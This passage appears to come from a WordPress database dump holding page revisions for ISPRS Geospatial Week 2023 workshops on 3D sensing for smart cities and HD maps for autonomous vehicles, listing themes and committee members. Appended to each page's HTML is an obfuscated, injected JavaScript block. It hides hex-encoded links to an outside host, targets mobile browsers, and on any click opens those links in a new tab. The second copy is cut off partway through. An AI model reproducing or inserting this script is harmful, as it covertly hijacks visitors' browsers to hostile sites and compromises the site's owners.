algorithms for smart city applications. Papers addressing the following topics are welcome: photogrammetric mapping, LiDAR point cloud processing, ubiquitous sensing, cross-modality sensing, etc. The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"38\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:brown;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Airborne photogrammetric mapping for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Airborne LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Mobile LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>UAS-based photogrammetric mapping for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>UAS borne LiDAR point cloud processing for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning methods for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Low-cost multi-sensor systems for smart cities</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-sensor system design and on-board processing</strong></h6>\n</li>\n<li>\n<h6><strong>Cross-modality sensing data integration</strong></h6>\n</li>\n<li>\n<h6><strong>Ubiquitous sensing with sensors in mobile devices</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor fusion in support of smart city applications</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:brown;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Andrea Lingua, Polytechnic University of Turin, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Jiaojiao Tian, German Aerospace Center (DLR), Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Rongjun Qin, Ohio State University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Bisheng Yang, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Cheng Wang, Chinese Academy of Sciences, China</strong></h6>\n</li>\n<li>\n<h6><strong>Chun Liu, Tongji University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Jinha Jung, Purdue University, USA</strong></h6>\n</li>\n<li>\n<h6><strong>Yan Xia, Technical University of Munich, Germany</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','3DS Smart Cities - 3D Sensing for Smart Cities','','inherit','closed','closed','','2572-revision-v1','','','2022-10-07 23:04:42','2022-10-07 23:04:42','',2572,'https://gsw2023.com/?p=2620',0,'revision','',0),
(2621,1,'2022-10-07 23:13:09','2022-10-07 23:13:09','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2553\" img_size=\"200x200\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"0\"]</p>\r\n<h5 style=\"text-align: justify; color: black;\">Autonomous driving vehicles, or self-driving cars, have made enormous progress in recent years. With advances in computing and sensor technologies, onboard systems can deal with a large amount of data and achieve real-time process continuously and accurately. These systems also handle several specialized functional schemes such as positioning, mapping, perception, motion planning and control. These key components are essential for the vehicle to achieve fully autonomous operation. In addition, HD maps provide detailed map information for navigating autonomous vehicles to ensure the navigation safety to protect human lives. The map itself serves as an additional “pseudo sensor” of the car and it signiﬁcantly enhances the performance and accuracy of perception and positioning algorithms, which are necessary for the vehicle to drive autonomously. In addition, HD maps and real time accurate positioning enable a number of services and applications, supporting the realization of smart cities.</h5>\r\n<h5 style=\"text-align: justify; color: black;\">This workshop will cover relevant topics and trends in mobile mapping and high definition maps for intelligent transportation and smart city applications, and also introduce the new tendencies of this new paradigm in geospatial science.</h5>\r\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][vc_column_text]</p>\r\n<h1><strong>CHAIRS</strong></h1>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"37\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]</p>\r\n<h5 style=\"text-align: left; color: green;\"><strong><u>Themes of event:</u></strong></h5>\r\n<ul>\r\n<li>\r\n<h6><strong>Static HD maps automated production and update</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Dynamic HD maps automated production and update</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Conventional and crowd sourcing mapping platforms for HD maps production </strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>3rd party certified low-cost multi-sensor mapping systems for ITS applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Autonomous vehicle navigation with HD point cloud maps</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Autonomous vehicle navigation with HD vector maps</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>HD maps applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Formats, standards and field practice guidelines </strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Georeferenced 3D spatial information processing for smart road applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Georeferenced 3D spatial information manipulation for connected vehicles</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Multi-sensor calibration</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Sensor cluster design and platform developments</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Multi-sensor fusion for seamless mapping and navigation applications</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Simultaneous localization and mapping with LiDAR or cameras</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Point cloud processing</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Deep learning for 3D spatial information processing</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Feature extraction from georeferenced images and point cloud</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Multi-sensor system assessment and quality validation</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>GNSS denied and challenging environments validation</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Novel application cases</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]<strong><u style=\"text-align: left; color: green;\">Scientific Committee:</u></strong></p>\r\n<h6><strong>Kai-Wei Chiang, National Cheng Kung University, Taiwan</strong></h6>\r\n<ul>\r\n<li>\r\n<h6><strong>Andrea Masiero, University of Florence, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Aboelmagd Noureldin, Queens University, Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Cheng Wang, Xiamen University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Antonio Vettore, University of Padova, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Ling Pei, Shanghai Jiao Tong University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Allison Kealy, RMIT, Australia</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Mohamed Elhabiby, Micro Engineering Tech Inc. (METI), Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Gunther Retscher, University of Vienna, Austria</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Jonathan Li, University of Waterloo, Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Xiaoji Niu, Wuhan University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Vassilis Gikas, NTUA, Greece</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Marco Piras, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Paolo Dabove, Polytechnic of Turin, Italy</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>You Li, Wuhan University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Chenglu Wen, Xiamen University, China</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Adel Mohamed Aly Elsayed Moussa, Calgary University, Canada</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Hsiu-Wen Chang Joly, PSL University, France</strong></h6>\r\n</li>\r\n<li>\r\n<h6><strong>Salil Goel, Uttar Pradesh, India</strong></h6>\r\n</li>\r\n</ul>\r\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 